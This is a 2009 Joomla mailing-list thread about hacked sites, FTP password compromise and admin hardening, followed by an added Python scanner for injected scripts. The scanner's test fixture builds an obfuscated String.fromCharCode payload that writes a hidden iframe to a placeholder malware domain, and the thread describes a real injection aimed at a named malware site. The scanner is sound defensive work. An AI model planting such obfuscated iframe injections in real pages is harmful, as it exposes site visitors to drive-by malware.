[joomla] several 1.0 sites hacked this week!

Barrie North barrie at compassdesigns.net
Thu Mar 26 20:47:57 EDT 2009


But why are you using javascript for your menus... ;)

/runs to twitter

Barrie North
~Fully Managed Joomla Sites~
www.simplweb.com/joomla
~Join the Community at compassdesigns.net~
www.compassdesigns.net/join-the-community.html


On Thu, Mar 26, 2009 at 8:40 PM, Mitch Pirtle <mitch.pirtle at gmail.com> wrote:

> This information is unfortunately too late for Barrie, but I have
> found vsftpd (Very Secure FTP Daemon) not only secure but wikkid fast
> to boot. It supports SFTP, so folks that don't have SSH/SCP can still
> use a half-decent client and run over a moderately encrypted
> connection.
>
> As for the defense of folks running PHP4, mass shared hosting, and
> whatnot... I just made an off-hand comment a few seconds ago regarding
> folks using outdated javascript menus that search bots could not
> parse:
>
> "If you're not keeping up with the times, don't expect your website to
> perform well."
>
> I cannot stress that enough. Seriously. Don't take your horse and cart
> on the information superhighway; and if that is all you can afford,
> perhaps you need to save up before you take that first ride, and for
> certain stay well away from the fast lane. Just like starting a
> business - if you cannot pony up the funds required to incorporate a
> legitimate entity, don't expect to be treated like a legitimate
> entity!
>
> I know it may sound harsh, maybe I'm just grumpy from working too many
> hours.
>
> -- Mitch, grumpy from working too many hours
>
> 2009/3/26 Barrie North <barrie at compassdesigns.net>:
> > We found the attacks/IP in the server logs. A financially backed hacker
> > outfit from Nigeria, go figure. The joys of having a PR9 site =P
> >
> > Our password was 10 chars including letters, numbers and punctuation. We are
> > hosted on a "secured" rackspace server.
> >
> > We don't have FTP running any more!
> >
> > Barrie North
> > ~Fully Managed Joomla Sites~
> > www.simplweb.com/joomla
> > ~Join the Community at compassdesigns.net~
> > www.compassdesigns.net/join-the-community.html
> >
> >
> > On Thu, Mar 26, 2009 at 7:29 PM, Atir Javid <atirjavid at gmail.com> wrote:
> >>
> >> Hello Barrie,
> >>
> >> May I inquire as to how you verified the attack?  I know that FTP
> >> bruteforcing is extremely difficult, and that is very improbable.
> >> What you may have faced was a dictionary attack, which may have worked
> >> with some luck if you had a weak password.  A password including a mix
> >> of
> >>
> >> 1) UPPERCASE
> >> 2) lowercase
> >> 3) punctuation/!#$.,
> >> 4) numbers
> >>
> >> and have a good strong/long password, and you would never fall victim to a
> >> dictionary attack.
> >>
> >> As for bruteforce, an ftpd simply denies access after 3 or 5
> >> (configurable, usually defaults to 3) failed login attempts for some
> >> time.  Some hosts go as far as restricting ftp access until you call
> >> them and verify the problem.  Also, brute forcing over a TCP pipe a
> >> slow protocol such as FTP is virtually impossible.  At this rate it
> >> would take YEARS to bruteforce the password if not DECADES.
> >>
> >> @ Other users
> >> Also make sure to go into joomla user configuration and change the
> >> username of 'admin' to something else.
> >> To protect your joomla administration section, if you have a static ip,
> >> you can add
> >>
> >> order allow,deny
> >> deny from all
> >> allow from your.static.ip.here
> >>
> >> to a file called .htaccess in your administration folder.  If for some
> >> reason your ip changes and you get locked out, simply login via FTP
> >> and update the .htaccess file.  There are some other advanced methods
> >> for protecting your administration folder.
> >>
> >> Also, FTP was a protocol developed 30+ years ago.  It is not secure,
> >> clear text authentication, etc.  FTP must go.  If you can help it, do
> >> not use ftp, instead SFTP, or SSH.  Just.. anything but FTP.  Sadly,
> >> that's all that is easy to use, highly available across all hosts, and
> >> not everyone on shared hosting provides SSH access.  If you can do
> >> without it, do without it. http://wooledge.org/mywiki/FtpMustDie
> >>
> >> I have seen more sites hacked due to unpatched php or bad php
> >> code (mostly from 3rd party addons) than I have with FTP though.
> >>
> >> Still with good security practices you can reduce the risk considerably.
> >>
> >> Peace.
> >>
> >>
> >>
> >>
> >> 2009/3/26 Barrie North <barrie at compassdesigns.net>:
> >> > We got hacked last month by a brute force attack on our FTP password. Once
> >> > they had that, they got into the Joomla files.
> >> >
> >> > Any site can be hacked. The other half of the equation is vigilance and
> >> > backups :)
> >> >
> >> > Barrie North
> >> > ~Fully Managed Joomla Sites~
> >> > www.simplweb.com/joomla
> >> > ~Join the Community at compassdesigns.net~
> >> > www.compassdesigns.net/join-the-community.html
> >> >
> >> >
> >> > On Wed, Mar 25, 2009 at 11:23 PM, Mark Simko <masimko at verizon.net>
> >> > wrote:
> >> >>
> >> >> Several of my clients' 1.0.15 sites have been hacked this week!  Is
> >> >> there a problem with 1.0?
> >> >>
> >> >> I don't see an announcement on joomla.org
> >> >>
> >> >> I just saw that my site was hacked the other day. Fortunately they
> >> >> bunged it up a bit, so the code didn't run, but instead gave an error
> >> >> message.
> >> >>
> >> >> What they had done is append javascript to the index.php file. It was
> >> >> disguised as ascii codes, and there were several vars defined and
> >> >> substituted in, but the result was that it attempted to open a hidden
> >> >> iframe directed to siplank.com. When I tried to open siplank.com in a
> >> >> web browser (yes, I did that! I do lots of crazy things out of
> >> >> curiosity) Firefox stopped it with a warning about the site being known
> >> >> for malware.
> >> >>
> >> >> I'm running 1.5.9 on a shared host. I will be calling my host and asking
> >> >> them what they can find out from their logs as to what happened.
> >> >>
> >> >> _______________________________________________
> >> >> New York PHP SIG: Joomla! Mailing List
> >> >> http://lists.nyphp.org/mailman/listinfo/joomla
> >> >>
> >> >> NYPHPCon 2006 Presentations Online
> >> >> http://www.nyphpcon.com
> >> >>
> >> >> Show Your Participation in New York PHP
> >> >> http://www.nyphp.org/show_participation.php
> >> >
> >> >
> >
> >
>
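Added example, not written by anyone in this thread: a small Python scanner for the kind of tampering Mark describes, a script block appended after index.php's closing PHP tag, with the payload hidden as String.fromCharCode character codes that decode to a zero-size iframe. The sample index.php contents and the malware.example.invalid domain are constructed for the demonstration, and the functions scan_php_source and scan_files are this example's own names, not Joomla code. Running it over a site's PHP files after a restore is one concrete form of the vigilance Barrie mentions.

```python
import re
import sys

# --- Constructed fixtures (not from the thread) -------------------------------
# A stripped-down index.php in the shape Joomla ships, ending in a closing tag.
CLEAN_INDEX_PHP = """<?php
define('_JEXEC', 1);
define('JPATH_BASE', dirname(__FILE__));
require_once JPATH_BASE . '/includes/framework.php';
?>
"""

def _js_fromcharcode(text):
    """Fixture helper only: write text as a String.fromCharCode(...) literal."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in text) + ")"

# Zero-size iframe to a placeholder domain, split over two JS vars and appended
# after the closing tag, mirroring the injection described in the thread.
_PAYLOAD = '<iframe src="http://malware.example.invalid/" width="0" height="0"></iframe>'
INFECTED_INDEX_PHP = (
    CLEAN_INDEX_PHP
    + "<script>var a=" + _js_fromcharcode(_PAYLOAD[:30])
    + ";var b=" + _js_fromcharcode(_PAYLOAD[30:])
    + ";document.write(a+b);</script>\n"
)

# --- Detection ----------------------------------------------------------------
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
HIDDEN_IFRAME_RE = re.compile(
    r"<iframe\b[^>]*?(?:width=[\"']?0\b|height=[\"']?0\b|visibility:\s*hidden|display:\s*none)",
    re.IGNORECASE,
)
IFRAME_SRC_RE = re.compile(r"<iframe\b[^>]*?\bsrc=[\"']?(https?://[^\"'\s>]+)", re.IGNORECASE)

def decoded_strings(js):
    """Concatenate every String.fromCharCode(...) literal in source order, so a
    payload spread over several variables is reassembled before inspection."""
    parts = []
    for m in FROMCHARCODE_RE.finditer(js):
        codes = [int(x) for x in m.group(1).split(",") if x.strip()]
        parts.append("".join(chr(c) for c in codes))
    return "".join(parts)

def trailing_content_after_php(src):
    """Whatever follows the last '?>'; a pure-PHP file should have nothing there."""
    idx = src.rfind("?>")
    return src[idx + 2:] if idx != -1 else ""

def scan_php_source(src):
    """Return a list of human-readable findings; an empty list means clean."""
    findings = []
    if "<script" in trailing_content_after_php(src).lower():
        findings.append("script block appended after closing PHP tag")
    for body in SCRIPT_RE.findall(src):
        if FROMCHARCODE_RE.search(body):
            findings.append("String.fromCharCode obfuscation in script block")
        decoded = decoded_strings(body)
        if HIDDEN_IFRAME_RE.search(decoded):
            findings.append("hidden iframe in decoded script")
        for m in IFRAME_SRC_RE.finditer(decoded):
            findings.append("iframe src: " + m.group(1))
    return findings

def scan_files(paths):
    """Map each path with findings to its finding list (clean files are omitted)."""
    report = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings = scan_php_source(fh.read())
        if findings:
            report[path] = findings
    return report

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, findings in scan_files(sys.argv[1:]).items():
            print(path)
            for finding in findings:
                print("  -", finding)
    else:
        print("clean:", scan_php_source(CLEAN_INDEX_PHP))
        print("infected:", scan_php_source(INFECTED_INDEX_PHP))
```

Usage: `python scan.py index.php templates/*/index.php` on a copy of the site, or with no arguments to see the two constructed fixtures scored. The check on content after the closing `?>` is the cheapest signal here because Joomla 1.0/1.5 core files end in PHP, so any markup after that tag is a change worth explaining; decoding the character codes before matching is what lets the iframe pattern fire at all.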